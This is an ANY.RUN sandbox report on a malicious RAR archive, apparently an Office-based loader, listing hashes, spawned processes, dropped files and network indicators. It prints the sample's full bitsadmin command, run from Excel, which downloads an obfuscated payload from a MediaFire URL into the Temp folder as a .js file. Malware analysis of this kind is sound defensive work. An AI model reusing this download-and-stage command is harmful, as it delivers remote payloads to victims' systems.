analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

C:\Users\admin\Desktop\test2.rar

Full analysis: https://app.any.run/tasks/43217a82-eac2-4d58-8a62-6c23d898f66e
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 17, 2019, 17:37:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

B80D25B2EAAEBF29EC3D827845331A7F

SHA1:

BBBC72952FEA349B1F58BD7107163F9BEFD90A19

SHA256:

1CC34EEE0238CC34846AC01B2B50E1195BC7919F787E9974D49577E724CE6000

SSDEEP:

1536:skAluMAjHtm1m7CkYRM4jxiHfwBZxHE1k5DPP:TARUmXRMsUd1cDn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITADMIN.EXE for downloading application

      • EXCEL.EXE (PID: 3028)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3028)
  • SUSPICIOUS

    No suspicious indicators.
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3216)
      • EXCEL.EXE (PID: 3028)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3216)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs excel.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2924"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\test2.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
3216"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\test2.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3028"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2344"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal http://download1591.mediafire.com/dvxx4wkx2qzg/lqn7rd8dez3cvmc/obfuscated.tmp C:\Users\admin\AppData\Local\Temp\\pepe.jsC:\Windows\System32\bitsadmin.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149580817
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Total events
1 106
Read events
1 021
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
2924WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2924.22005\test2.docx
MD5:
SHA256:
3216WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRFE1D.tmp.cvr
MD5:
SHA256:
3028EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR222F.tmp.cvr
MD5:
SHA256:
3216WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8E0F138661D46BEE068DD1A9F68448F5
SHA256:6757974DA99615BE6E39A96EE19A8D89BD36597F1E95F1C8585535B4C56DF25F
3216WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E38B7067.emfemf
MD5:FC5B7B369B4FEB2BDC517041DEF922BC
SHA256:2D9055098370C3F76D3F07BA9C396B0E611738F198AF2C8351599B39D2A88C28
3216WINWORD.EXEC:\Users\admin\Desktop\~$test2.docxpgc
MD5:958F8D33FAEE5BCDC87E6BAA4181F94F
SHA256:74174E42213C8A0FE3BF652610F1B29A309E64974EDFD8D5961F8E12AABD96FE
3216WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\test2.docx.LNKlnk
MD5:E1848FF67176323BF21878741EEABAAB
SHA256:98782AA61E5F67D89CC9222916E64FCECA958D789C82A2087DA5379C7C11C3EB
3216WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:EDAC7180BF417682F38FDEAD4BEB7782
SHA256:74B3BCBB436C73B0D72D9B4B75B3F4ED7160FCB2EBDF4171C25E1DB93E44EC63
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
HEAD
302
199.91.152.91:80
http://download1591.mediafire.com/dvxx4wkx2qzg/lqn7rd8dez3cvmc/obfuscated.tmp
US
malicious
HEAD
200
104.19.194.29:80
http://www.mediafire.com/download_repair.php?flag=4&dkey=dvxx4wkx2qz&qkey=lqn7rd8dez3cvmc&ip=31.204.155.49&ref=3
US
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
199.91.152.91:80
download1591.mediafire.com
MediaFire, LLC
US
malicious
104.19.194.29:80
www.mediafire.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
download1591.mediafire.com
  • 199.91.152.91
malicious
www.mediafire.com
  • 104.19.194.29
  • 104.19.195.29
shared

Threats

PID
Process
Class
Message
A Network Trojan was detected
SC BAD_UNKNOWN Request, which might be made by Trojan-Downloader.MSOffice.DdeExec
No debug info